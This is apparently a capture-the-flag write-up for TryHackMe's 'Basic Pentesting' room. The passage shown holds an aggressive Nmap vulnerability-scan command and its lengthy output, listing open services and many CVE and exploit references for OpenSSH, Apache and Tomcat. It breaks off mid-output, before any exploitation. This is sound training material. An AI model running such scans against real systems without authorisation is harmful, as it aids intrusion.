2021-11-04 - Cardboard Iguana Security

# Basic pentesting > [!note] > ["Basic Pentesting" on TryHackMe](https://tryhackme.com/room/basicpentestingjt) ## Background The description of this CTF is sparse, but the goal seems to be to (1) enumerate the services on a machine, (2) brute force a login over [[SSH]], and (3) elevate privileges (presumably to root, but things are a little vague here). For this attempt, the target machine IP is 10.10.74.250. ## Recon We begin by running a full [[Nmap]] scan: ```bash sudo nmap -vv -oA basic-pentesting -A -sS --script vuln \ -p- 10.10.74.250 ``` Output: ``` # Nmap 7.92 scan initiated Thu Nov 4 19:56:42 2021 as: nmap -vv -oA basic-pentesting -A -sS --script vuln -p- 10.10.74.250 Increasing send delay for 10.10.74.250 from 5 to 10 due to 11 out of 13 dropped probes since last increase. Increasing send delay for 10.10.74.250 from 10 to 20 due to 11 out of 12 dropped probes since last increase. Nmap scan report for 10.10.74.250 Host is up, received timestamp-reply ttl 61 (0.17s latency). Scanned at 2021-11-04 19:56:54 MDT for 1378s Not shown: 65529 closed tcp ports (reset) PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | vulners: | cpe:/a:openbsd:openssh:7.2p2: | PACKETSTORM:140070 7.8 https://vulners.com/packetstorm/PACKETSTORM:140070 *EXPLOIT* | EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09 7.8 https://vulners.com/exploitpack/EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09 *EXPLOIT* | EDB-ID:40888 7.8 https://vulners.com/exploitdb/EDB-ID:40888 *EXPLOIT* | CVE-2016-8858 7.8 https://vulners.com/cve/CVE-2016-8858 | CVE-2016-6515 7.8 https://vulners.com/cve/CVE-2016-6515 | 1337DAY-ID-26494 7.8 https://vulners.com/zdt/1337DAY-ID-26494 *EXPLOIT* | SSV:92579 7.5 https://vulners.com/seebug/SSV:92579 *EXPLOIT* | CVE-2016-10009 7.5 https://vulners.com/cve/CVE-2016-10009 | 1337DAY-ID-26576 7.5 https://vulners.com/zdt/1337DAY-ID-26576 *EXPLOIT* | SSV:92582 7.2 https://vulners.com/seebug/SSV:92582 *EXPLOIT* | CVE-2016-10012 7.2 https://vulners.com/cve/CVE-2016-10012 | CVE-2015-8325 7.2 https://vulners.com/cve/CVE-2015-8325 | SSV:92580 6.9 https://vulners.com/seebug/SSV:92580 *EXPLOIT* | CVE-2016-10010 6.9 https://vulners.com/cve/CVE-2016-10010 | 1337DAY-ID-26577 6.9 https://vulners.com/zdt/1337DAY-ID-26577 *EXPLOIT* | MSF:ILITIES/UBUNTU-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2019-6111/ *EXPLOIT* | MSF:ILITIES/SUSE-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-6111/ *EXPLOIT* | MSF:ILITIES/SUSE-CVE-2019-25017/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-25017/ *EXPLOIT* | MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/ *EXPLOIT* | MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/ *EXPLOIT* | MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/ *EXPLOIT* | MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/ *EXPLOIT* | MSF:ILITIES/IBM-AIX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/IBM-AIX-CVE-2019-6111/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/ *EXPLOIT* | MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/ *EXPLOIT* | MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/ *EXPLOIT* | MSF:ILITIES/DEBIAN-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-6111/ *EXPLOIT* | MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/ *EXPLOIT* | MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/ *EXPLOIT* | MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/ *EXPLOIT* | MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/ *EXPLOIT* | EXPLOITPACK:98FE96309F9524B8C84C508837551A19 5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 *EXPLOIT* | EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 *EXPLOIT* | EDB-ID:46516 5.8 https://vulners.com/exploitdb/EDB-ID:46516 *EXPLOIT* | CVE-2019-6111 5.8 https://vulners.com/cve/CVE-2019-6111 | 1337DAY-ID-32328 5.8 https://vulners.com/zdt/1337DAY-ID-32328 *EXPLOIT* | 1337DAY-ID-32009 5.8 https://vulners.com/zdt/1337DAY-ID-32009 *EXPLOIT* | SSV:91041 5.5 https://vulners.com/seebug/SSV:91041 *EXPLOIT* | PACKETSTORM:140019 5.5 https://vulners.com/packetstorm/PACKETSTORM:140019 *EXPLOIT* | PACKETSTORM:136234 5.5 https://vulners.com/packetstorm/PACKETSTORM:136234 *EXPLOIT* | EXPLOITPACK:F92411A645D85F05BDBD274FD222226F 5.5 https://vulners.com/exploitpack/EXPLOITPACK:F92411A645D85F05BDBD274FD222226F *EXPLOIT* | EXPLOITPACK:9F2E746846C3C623A27A441281EAD138 5.5 https://vulners.com/exploitpack/EXPLOITPACK:9F2E746846C3C623A27A441281EAD138 *EXPLOIT* | EXPLOITPACK:1902C998CBF9154396911926B4C3B330 5.5 https://vulners.com/exploitpack/EXPLOITPACK:1902C998CBF9154396911926B4C3B330 *EXPLOIT* | EDB-ID:40858 5.5 https://vulners.com/exploitdb/EDB-ID:40858 *EXPLOIT* | CVE-2016-3115 5.5 https://vulners.com/cve/CVE-2016-3115 | SSH_ENUM 5.0 https://vulners.com/canvas/SSH_ENUM *EXPLOIT* | PACKETSTORM:150621 5.0 https://vulners.com/packetstorm/PACKETSTORM:150621 *EXPLOIT* | MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS 5.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS *EXPLOIT* | EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 5.0 https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 *EXPLOIT* | EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 5.0 https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 *EXPLOIT* | EDB-ID:45939 5.0 https://vulners.com/exploitdb/EDB-ID:45939 *EXPLOIT* | CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919 | CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473 | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906 | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708 | 1337DAY-ID-31730 5.0 https://vulners.com/zdt/1337DAY-ID-31730 *EXPLOIT* | EDB-ID:45233 4.6 https://vulners.com/exploitdb/EDB-ID:45233 *EXPLOIT* | EDB-ID:40963 4.6 https://vulners.com/exploitdb/EDB-ID:40963 *EXPLOIT* | EDB-ID:40962 4.6 https://vulners.com/exploitdb/EDB-ID:40962 *EXPLOIT* | CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617 | MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ *EXPLOIT* | MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ *EXPLOIT* | EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF 4.3 https://vulners.com/exploitpack/EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF *EXPLOIT* | EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF 4.3 https://vulners.com/exploitpack/EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF *EXPLOIT* | CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 | CVE-2016-6210 4.3 https://vulners.com/cve/CVE-2016-6210 | 1337DAY-ID-25440 4.3 https://vulners.com/zdt/1337DAY-ID-25440 *EXPLOIT* | 1337DAY-ID-25438 4.3 https://vulners.com/zdt/1337DAY-ID-25438 *EXPLOIT* | CVE-2019-6110 4.0 https://vulners.com/cve/CVE-2019-6110 | CVE-2019-6109 4.0 https://vulners.com/cve/CVE-2019-6109 | CVE-2018-20685 2.6 https://vulners.com/cve/CVE-2018-20685 | SSV:92581 2.1 https://vulners.com/seebug/SSV:92581 *EXPLOIT* | CVE-2016-10011 2.1 https://vulners.com/cve/CVE-2016-10011 | PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT* | PACKETSTORM:140261 0.0 https://vulners.com/packetstorm/PACKETSTORM:140261 *EXPLOIT* | PACKETSTORM:138006 0.0 https://vulners.com/packetstorm/PACKETSTORM:138006 *EXPLOIT* | PACKETSTORM:137942 0.0 https://vulners.com/packetstorm/PACKETSTORM:137942 *EXPLOIT* | EDB-ID:46193 0.0 https://vulners.com/exploitdb/EDB-ID:46193 *EXPLOIT* | EDB-ID:40136 0.0 https://vulners.com/exploitdb/EDB-ID:40136 *EXPLOIT* | EDB-ID:40113 0.0 https://vulners.com/exploitdb/EDB-ID:40113 *EXPLOIT* | EDB-ID:39569 0.0 https://vulners.com/exploitdb/EDB-ID:39569 *EXPLOIT* | 1337DAY-ID-30937 0.0 https://vulners.com/zdt/1337DAY-ID-30937 *EXPLOIT* |_ 1337DAY-ID-10010 0.0 https://vulners.com/zdt/1337DAY-ID-10010 *EXPLOIT* 80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu)) |_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable | http-enum: |_ /development/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)' |_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php | vulners: | cpe:/a:apache:http_server:2.4.18: | CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275 | CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691 | CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679 | CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668 | CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169 | CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167 | MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/ 7.2 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/ *EXPLOIT* | MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/ 7.2 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/ *EXPLOIT* | EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB 7.2 https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB *EXPLOIT* | CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211 | 1337DAY-ID-32502 7.2 https://vulners.com/zdt/1337DAY-ID-32502 *EXPLOIT* | MSF:ILITIES/UBUNTU-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1312/ *EXPLOIT* | MSF:ILITIES/UBUNTU-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2017-15715/ *EXPLOIT* | MSF:ILITIES/SUSE-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2017-15715/ *EXPLOIT* | MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/ *EXPLOIT* | MSF:ILITIES/ORACLE_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2017-15715/ *EXPLOIT* | MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/ *EXPLOIT* | MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2017-15715/ *EXPLOIT* | MSF:ILITIES/FREEBSD-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/FREEBSD-CVE-2017-15715/ *EXPLOIT* | MSF:ILITIES/DEBIAN-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2017-15715/ *EXPLOIT* | MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/ *EXPLOIT* | MSF:ILITIES/APACHE-HTTPD-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2017-15715/ *EXPLOIT* | MSF:ILITIES/AMAZON_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2017-15715/ *EXPLOIT* | MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ *EXPLOIT* | MSF:ILITIES/ALPINE-LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2017-15715/ *EXPLOIT* | FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT* | CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438 | CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452 | CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312 | CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715 | 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT* | CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082 | CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788 | MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/ 6.0 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/ *EXPLOIT* | MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/ 6.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/ *EXPLOIT* | CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217 | EDB-ID:47689 5.8 https://vulners.com/exploitdb/EDB-ID:47689 *EXPLOIT* | CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927 | CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098 | 1337DAY-ID-33577 5.8 https://vulners.com/zdt/1337DAY-ID-33577 *EXPLOIT* | CVE-2016-5387 5.1 https://vulners.com/cve/CVE-2016-5387 | SSV:96537 5.0 https://vulners.com/seebug/SSV:96537 *EXPLOIT* | MSF:ILITIES/UBUNTU-CVE-2018-1333/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1333/ *EXPLOIT* | MSF:ILITIES/UBUNTU-CVE-2018-1303/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1303/ *EXPLOIT* | MSF:ILITIES/UBUNTU-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2017-15710/ *EXPLOIT* | MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/ *EXPLOIT* | MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/ *EXPLOIT* | MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/ *EXPLOIT* | MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/ *EXPLOIT* | MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/ *EXPLOIT* | MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED 5.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED *EXPLOIT* | EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D 5.0 https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D *EXPLOIT* | EXPLOITPACK:2666FB0676B4B582D689921651A30355 5.0 https://vulners.com/exploitpack/EXPLOITPACK:2666FB0676B4B582D689921651A30355 *EXPLOIT* | EDB-ID:40909 5.0 https://vulners.com/exploitdb/EDB-ID:40909 *EXPLOIT* | CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798 | CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193 | CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690 | CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934 | CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567 | CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220 | CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196 | CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199 | CVE-2018-17189 5.0 https://vulners.com/cve/CVE-2018-17189 | CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333 | CVE-2018-1303 5.0 https://vulners.com/cve/CVE-2018-1303 | CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798 | CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710 | CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743 | CVE-2016-8740 5.0 https://vulners.com/cve/CVE-2016-8740 | CVE-2016-4979 5.0 https://vulners.com/cve/CVE-2016-4979 | 1337DAY-ID-28573 5.0 https://vulners.com/zdt/1337DAY-ID-28573 *EXPLOIT* | MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-0197/ 4.9 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-0197/ *EXPLOIT* | CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197 | MSF:ILITIES/UBUNTU-CVE-2018-1302/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1302/ *EXPLOIT* | MSF:ILITIES/UBUNTU-CVE-2018-1301/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1301/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/ *EXPLOIT* | MSF:ILITIES/DEBIAN-CVE-2019-10092/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-10092/ *EXPLOIT* | MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/ *EXPLOIT* | MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/ *EXPLOIT* | EDB-ID:47688 4.3 https://vulners.com/exploitdb/EDB-ID:47688 *EXPLOIT* | CVE-2020-11985 4.3 https://vulners.com/cve/CVE-2020-11985 | CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092 | CVE-2018-1302 4.3 https://vulners.com/cve/CVE-2018-1302 | CVE-2018-1301 4.3 https://vulners.com/cve/CVE-2018-1301 | CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763 | CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975 | CVE-2016-1546 4.3 https://vulners.com/cve/CVE-2016-1546 | 4013EC74-B3C1-5D95-938A-54197A58586D 4.3 https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D *EXPLOIT* | 1337DAY-ID-33575 4.3 https://vulners.com/zdt/1337DAY-ID-33575 *EXPLOIT* | MSF:ILITIES/UBUNTU-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1283/ *EXPLOIT* | MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/ *EXPLOIT* | MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/ *EXPLOIT* | MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/ *EXPLOIT* | MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/ *EXPLOIT* | CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283 | CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612 | PACKETSTORM:152441 0.0 https://vulners.com/packetstorm/PACKETSTORM:152441 *EXPLOIT* | EDB-ID:46676 0.0 https://vulners.com/exploitdb/EDB-ID:46676 *EXPLOIT* | EDB-ID:42745 0.0 https://vulners.com/exploitdb/EDB-ID:42745 *EXPLOIT* | 1337DAY-ID-663 0.0 https://vulners.com/zdt/1337DAY-ID-663 *EXPLOIT* | 1337DAY-ID-601 0.0 https://vulners.com/zdt/1337DAY-ID-601 *EXPLOIT* | 1337DAY-ID-4533 0.0 https://vulners.com/zdt/1337DAY-ID-4533 *EXPLOIT* | 1337DAY-ID-3109 0.0 https://vulners.com/zdt/1337DAY-ID-3109 *EXPLOIT* |_ 1337DAY-ID-2237 0.0 https://vulners.com/zdt/1337DAY-ID-2237 *EXPLOIT* |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-jsonp-detection: Couldn't find any JSONP endpoints. |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 8009/tcp open ajp13 syn-ack ttl 61 Apache Jserv (Protocol v1.3) 8080/tcp open http syn-ack ttl 61 Apache Tomcat 9.0.7 | http-enum: | /examples/: Sample scripts | /manager/html/upload: Apache Tomcat (401 ) | /manager/html: Apache Tomcat (401 ) |_ /docs/: Potentially interesting folder |_http-jsonp-detection: Couldn't find any JSONP endpoints. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-csrf: Couldn't find any CSRF vulnerabilities. | vulners: | cpe:/a:apache:tomcat:9.0.7: | B41082A1-4177-53E2-A74C-8ABA13AA3E86 10.0 https://vulners.com/githubexploit/B41082A1-4177-53E2-A74C-8ABA13AA3E86 *EXPLOIT* | TOMCAT:5FF617CEB667027ABB70FDFB3A8FFD4C 9.3 https://vulners.com/tomcat/TOMCAT:5FF617CEB667027ABB70FDFB3A8FFD4C | SMNTC-107906 9.3 https://vulners.com/symantec/SMNTC-107906 | PACKETSTORM:153506 9.3 https://vulners.com/packetstorm/PACKETSTORM:153506 *EXPLOIT* | MSF:EXPLOIT/WINDOWS/HTTP/TOMCAT_CGI_CMDLINEARGS 9.3 https://vulners.com/metasploit/MSF:EXPLOIT/WINDOWS/HTTP/TOMCAT_CGI_CMDLINEARGS *EXPLOIT* | EDB-ID:47073 9.3 https://vulners.com/exploitdb/EDB-ID:47073 *EXPLOIT* | DB8D8364-06FB-55E8-934E-C013B00821B5 9.3 